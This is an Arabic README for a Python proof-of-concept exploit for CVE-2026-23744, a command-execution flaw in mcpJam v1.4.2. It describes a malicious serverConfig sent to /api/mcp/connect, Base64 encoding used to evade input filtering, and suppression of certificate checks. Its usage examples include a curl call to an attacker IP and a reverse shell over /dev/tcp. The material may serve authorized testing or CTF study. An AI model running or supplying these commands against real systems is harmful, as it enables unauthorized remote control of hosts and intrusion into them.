
cve-2026-23744 python استغلال
استغلال إثبات مفهوم بلغة Python 3 للثغرة CVE-2026-23744، وهي ثغرة تنفيذ أوامر اعتباطية تؤثر على mcpJam v1.4.2.
تقوم هذه الأداة بأتمتة توصيل الحمولة عن طريق ترميز الأوامر بتنسيق Base64 بشفافية قبل الإرسال، مما يساعد في تجاوز آليات التحقق الصارمة من الإدخال وتصفية الأحرف. يتم فك ترميز الحمولة وتنفيذها عبر غلاف /bin/bash على النظام الهدف.
يتم ترميز الأوامر تلقائيًا قبل الإرسال، مما يحسن الموثوقية عند استهداف التطبيقات التي تفرض تحققًا صارمًا من الإدخال أو قيودًا على الأحرف.
يدعم تنفيذ الأوامر الاعتباطية، بما في ذلك:
sh, bash, nc, إلخ.)يعرض:
هذا يبسط استكشاف الأخطاء والتحقق من صحة الاستغلال.
يقوم بكتم تحذيرات التحقق من الشهادة، مما يسمح بالتفاعل مع الأهداف التي تستخدم شهادات SSL ذاتية التوقيع أو غير موثوقة.
قم بتثبيت الاعتماد المطلوب:
pip install requests
python3 exploit.py <target_url> "<command>"
python3 exploit.py http://devhub.com:6274 "curl http://10.10.14.70:8888"
python3 exploit.py http://devhub.com:6274 "sh -i >& /dev/tcp/10.10.14.70/4444 0>&1"
يستهدف الاستغلال نقطة النهاية /api/mcp/connect عن طريق إنشاء كائن serverConfig خبيث.
بدلاً من إرسال الأوامر مباشرة، يتم تحويل الحمولة إلى سلسلة مشفرة بتنسيق Base64 وتنفيذها عبر Bash:
"args": [
"-c",
f"echo {base64_payload} | base64 -d | bash"
]
يساعد هذا الأسلوب في تجنب التصفية على مستوى التطبيق مع ضمان فك ترميز الحمولة وتنفيذها بالكامل على المضيف الهدف.
serverConfig.base64 -d./bin/bash.[!WARNING] يتم توفير هذا المشروع لأغراض تعليمية فقط، وتقييمات الأمن المصرح بها، وبيئات Capture The Flag (CTF).
الاستخدام غير المصرح به ضد أنظمة ليس لديك إذن صريح لها غير قانوني وغير أخلاقي. لا يتحمل المؤلف أي مسؤولية عن أي سوء استخدام أو أضرار أو عواقب قانونية ناتجة عن استخدام هذا البرنامج.